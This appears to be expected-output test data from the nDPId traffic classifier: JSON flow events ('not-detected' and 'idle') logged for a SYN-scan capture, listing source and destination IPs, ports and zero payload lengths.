+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060598,"flow_last_seen":1278275060598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060598,"flow_last_seen":1278275060598,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7921,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7921,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3826,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3827,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3826,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3827,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5877,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1782,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7937,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7938,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7937,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7938,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
